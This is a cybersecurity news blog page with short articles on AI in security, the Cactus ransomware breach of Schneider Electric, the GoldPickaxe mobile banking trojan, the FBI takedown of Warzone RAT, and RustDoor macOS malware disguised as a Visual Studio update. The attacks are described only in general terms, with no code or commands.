At the turn of the millennium, cyber threats aimed at creating chaos and notoriety were rampant. Organisations relied on basic security measures, including antivirus software and firewalls. During this time, AI emerged as a valuable tool, demonstrating its ability to identify and quarantine suspicious messages in the face of surging spam emails.

A Turning Point (2010–2020)

The structure shifted with the rise of SaaS applications, cloud computing, and BYOD policies, expanding the attack surface for cyber threats. Notable incidents like the Stuxnet worm and high-profile breaches at Target and Sony Pictures highlighted the need for advanced defences. AI became indispensable during this phase, with innovations like Cylance integrating machine-learning models to enhance defence mechanisms against complex attacks.

The Current Reality (2020–Present)

In today's world, how we work has evolved, leading to a hyperconnected IT environment. The attack surface has expanded further, challenging traditional security perimeters. Notably, AI has transitioned from being solely a defensive tool to being wielded by adversaries and defenders. This dual nature of AI introduces new challenges in the cybersecurity realm.

New Threats 

As AI evolves, new threats emerge, showcasing the innovation of threat actors. AI-generated phishing campaigns, AI-assisted target identification, and AI-driven behaviour analysis are becoming prevalent. Attackers now leverage machine learning to efficiently identify high-value targets, and AI-powered malware can mimic normal user behaviours to evade detection.

The Dual Role of AI

The evolving narrative in cybersecurity paints AI as both a shield and a spear. While it empowers defenders to anticipate and counter sophisticated threats, it also introduces complexities. Defenders must adapt to AI's dual nature, acclimatising to innovation to assimilate the intricacies of modern cybersecurity.

What's the Future Like?

As cybersecurity continues to evolve in how we leverage technology, organisations must remain vigilant. The promise lies in generative AI becoming a powerful tool for defenders, offering a new perspective to counter the threats of tomorrow. Adopting the changing landscape of AI-driven cybersecurity is essential to remain ahead in the field.

The intersection of AI and cybersecurity is reshaping how we protect our digital assets. From the early days of combating spam to the current era of dual-use AI, the journey has been transformative. As we journey through the future, the promise of AI as a powerful ally in the fight against cyber threats offers hope for a more secure digital culture. 


Read more »
Schneider Electric
Cactus ransomware Cyber Threats Cybersecurity Hackers malware Schneider Electric

Cactus Ransomware Strikes Schneider Electric, Demands Ransom

 


In a recent cyber attack, the Cactus ransomware group claims to have infiltrated Schneider Electric's Sustainability Business division, stealing a substantial 1.5 terabytes of data. The breach, which occurred on January 17th, has raised concerns as the gang now threatens to expose the stolen information if a ransom is not paid.

The ransomware group has already leaked 25MB of allegedly pilfered data on its dark web leak site, showcasing American citizens' passports and scans of non-disclosure agreement documents. Schneider Electric, a French multinational specialising in energy management and automation, is being coerced by the hackers to meet their ransom demand to prevent further leaks.

While the specific nature of the stolen data remains unknown, Schneider Electric's Sustainability Business division provides services related to renewable energy and regulatory compliance for major global companies such as Allegiant Travel Company, Clorox, DHL, DuPont, Hilton, Lexmark, PepsiCo, and Walmart. This implies that the compromised data might include sensitive information about customers' industrial control and automation systems and details regarding environmental and energy regulations compliance.

Cactus ransomware, a relatively new player in the cybercrime landscape, emerged in March 2023, employing double-extortion attacks. The group gains access to corporate networks through various means, including purchased credentials, partnerships with malware distributors, phishing attacks, or exploiting security vulnerabilities.

Once inside a target's network, the hackers navigate through the compromised system, stealing sensitive data to use as leverage in ransom negotiations. Since its inception, Cactus ransomware has targeted over 100 companies, leaking data online or threatening to do so while still engaging in ransom negotiations.

This incident is not the first time Schneider Electric has fallen victim to cyber threats. In the past, the company experienced data theft attacks orchestrated by the Clop ransomware, impacting over 2,700 other organisations. Schneider Electric, with a workforce exceeding 150,000 people globally, reported a substantial $28.5 billion in revenue in 2023.

Both companies and individuals need to stay alert to potential threats. Cybersecurity experts stress the significance of adopting strong security practices, regularly updating computer programs, and ensuring employees are well informed about potential risks. These measures are crucial for minimising the potential fallout from ransomware attacks, underlining the need for a proactive approach to safeguarding digital assets.

The Cactus ransomware attack on Schneider Electric is a stark reminder of the increasing sophistication and frequency of cyber threats in today's digital age. Businesses and individuals must prioritise cybersecurity to safeguard sensitive information and prevent financial and reputational damage.


Read more »
User Privacy
Banking Trojan Data Safety iPhone Users malware User Privacy

Beware, iPhone Users: iOS GoldDigger Trojan can Steal Face ID and Banking Details

 

Numerous people pick iPhones over Android phones because they believe iPhones are more secure. However, this may no longer be the case due to the emergence of a new banking trojan designed explicitly to target iPhone users.

According to a detailed report by the cybersecurity firm Group-IB, the Android trojan GoldDigger has now been successfully repurposed to target iPhone and iPad users. The company claims that this is the first malware designed for iOS, posing a huge threat by collecting facial recognition data, ID documents, and even SMS. 

The malware, discovered for the first time last October, now has a new version dubbed GoldPickaxe that is optimised for iOS and Android devices. When installed on an iPhone or Android phone, GoldPickaxe can collect facial recognition data, ID documents, and intercepted text messages, all with the goal of making it easier to withdraw funds from banks and other financial apps. To make matters worse, this biometric data is utilised to create AI deepfakes, which allow attackers to mimic victims and gain access to their bank accounts. 

It is vital to note that the GoldPickaxe malware is now targeting victims in Vietnam and Thailand. However, as with other malware schemes, if this one succeeds, the cybercriminals behind it may expand their reach to target iPhone and Android users in the United States, Europe, and the rest of the world. 

Android banking trojans are typically propagated via malicious apps and phishing campaigns. It is more difficult to install a trojan on an iPhone since Apple's ecosystem is more locked off than Google's. However, as hackers often do,they've figured out a way. 

Initially, the malware was disseminated via Apple's TestFlight program, which allows developers to deploy beta app versions without going through the App Store's authorization process. However, after Apple removed it from TestFlight, the hackers shifted to a more complicated way employing a Mobile Device Management (MDM) profile, which is generally used to manage enterprise devices. 

Given how successful a banking trojan like GoldDigger or GoldPickaxe can be, especially since it can target both iPhones and Android phones, this is unlikely to be the last time we hear about this spyware or the hackers behind it. As of now, even the most latest versions of iOS and iPadOS appear to be vulnerable to this Trojan. Group-IB has contacted Apple about the flaw, so a solution is likely in the works.
Read more »
Warzone RAT
Cyber Crime Cyber Threats FBI Hacking malware Warzone RAT

FBI Shuts Down Warzone RAT; Cybercriminals Arrested

 


In a major victory against cybercrime, the FBI has successfully taken down the Warzone RAT malware operation. This operation led to the arrest of two individuals involved in the illicit activities. One of the suspects, 27-year-old Daniel Meli from Malta, was apprehended for his role in the distribution of Warzone RAT, a notorious remote access trojan used for various cybercrimes.

Warzone RAT, also known as 'AveMaria,' surfaced in 2018 as a commodity malware offering a range of malicious features. These include bypassing User Account Control (UAC), stealing passwords and cookies, keylogging, remote desktop access, webcam recording, and more. Meli's arrest took place last week in Malta following an indictment issued by U.S. law enforcement authorities on December 12, 2023.

The charges against Meli include unauthorised damage to protected computers, illegally selling and advertising an electronic interception device, and participating in a conspiracy to commit several computer intrusion offences. He has been involved in the cybercrime space since at least 2012, starting at the age of 15 by selling hacking ebooks and the Pegasus RAT for a criminal group called 'Skynet-Corporation.'

Simultaneously, another key figure linked to Warzone RAT, Prince Onyeoziri Odinakachi, 31, from Nigeria, was arrested for providing customer support to cybercriminals purchasing access to the malware. Federal authorities in Boston seized four domains, including the primary website "warzone.ws," associated with Warzone RAT.

The international law enforcement effort coordinated by the FBI not only resulted in arrests but also identified and confiscated server infrastructure related to the malware across various countries, including Canada, Croatia, Finland, Germany, the Netherlands, and Romania.

While the U.S. Department of Justice (DoJ) mainly implicates Meli in the distribution and customer support for the malware, it remains unclear whether he is the original creator of Warzone RAT. The DoJ announcement reveals Meli's involvement as a seller in the cybercrime space since the age of 15, raising questions about the malware's origin.

Meli faces serious consequences, with a potential 15-year prison sentence, three years of supervised release, and fines of up to $500,000 or twice the gross gain or loss (whichever is greater) for the charges against him. The Northern District of Georgia seeks Meli's extradition from Malta to the United States for trial.

This successful operation not only brings two significant cybercriminals to justice but also marks a crucial step in dismantling the infrastructure supporting Warzone RAT. The FBI's coordinated efforts with international law enforcement agencies highlight the commitment to combating cyber threats on a global scale. The implications of this takedown will likely have a positive impact on cybersecurity efforts worldwide, deterring future vicious activities.


Read more »
Visual Studio
Cyberattacks CyberCrime Cyberhackers Cybersecurity CyberThreat macOS Apple malware Visual Studio

Malware Masked as a Visual Studio Update Poses a Threat to macOS

 


During the last few months, a significant and alarming development in the cybersecurity field has been the discovery of a new malware strain known as RustDoor that has specifically been designed for macOS users. It is RustDoor's sophisticated and deceptive tactics that set it apart from its counterparts—it masquerades as an update to Visual Studio, a highly regarded integrated development environment. 

Many insidious methods of infiltration are especially insidious as they rely on the implicit trust users place in routine software updates to download and install malware on their macOS machines unwittingly. As a clever strategy for posing as a legitimate software update, the RustDoor malware utilizes a crafty method to exploit the trust users already have in well-known and reliable software updates. 

This malware is created in an attempt to take advantage of the unaware nature of users who routinely install software updates from their software tools to ensure that they are safe and that their software tools function at their highest level. RustDoor attempts to imitate Visual Studio, one of the staple platforms in software development.  

In November 2023, Bitdefender initiated the campaign that rolled out the backdoor, and it is still going on distributing new versions of the backdoor. Research by Bitdefender indicates that Trojan.MAC.RustDoor is likely to be connected to the BlackCat/ALPHV malware. Known for its Rust language code, the newly discovered backdoor pretends to be an update to the Visual Studio code editor and impersonates it. 

Several variants of the malware have been identified by Bitdefender, all of which have the same functionality as the backdoor, even if they differ slightly. It is possible to harvest and exfiltrate files in all analyzed samples, as well as gather information about infected machines by using multiple commands. The information is sent to a command-and-control server to generate a victim ID that will be used as part of subsequent communications. 

It is likely that the first version of the backdoor, which appeared on November 20, 2023, was merely a test version with no complete persistence mechanism, but also contained a list file named "test" and a list file named "test" and other documents. There were several variants of the malware first observed at the end of November, both of which had larger files and contained complex JSON configurations as well as Apple scripts that would be used to exfiltrate certain documents, as well as a user's notes, from the Documents and Desktop folders. 

A malware attack copies the documents into a hidden folder, compresses them into a ZIP archive and sends them to the command and control server in a ZIP archive format. A new Bitdefender discovery has led to the discovery that RustDoor's configuration file contains options that can be used to impersonate different applications, as well as to customize a spoofed administrator password dialogue box. 

It is reported that Bitdefender has discovered three variants of RustDoor, the earliest one being seen since the beginning of October 2023, according to Bitdefender. Next, there was an updated version that was observed to be a testing version on November 30 that was found to contain an embedded Apple script that was used to exfiltrate files with specific extensions in the JSON format, this latest version likely was a testing version that preceded an updated version observed on November 22. 

This report provides a list of known indicators of RustDoor compromise, which includes binary files and download domains, as well as the URLs and commands for each of the four C&C servers that were discovered by the researchers. This ruse allows RustDoor to gain unauthorized access to a user's system once they install what appears to be a genuine update for Visual Studio that appears to be genuine.

The user then has increased exposure to a wide array of malicious activity. Considering that Visual Studio is widely used by professionals, developers, and even individuals, it is safe to say that the effects of RustDoor go beyond the individual users. There is a serious risk of large-scale attacks using this malware that could have profound consequences, realizing the critical importance of monitoring.
Read more »
Subscribe to: Posts (Atom)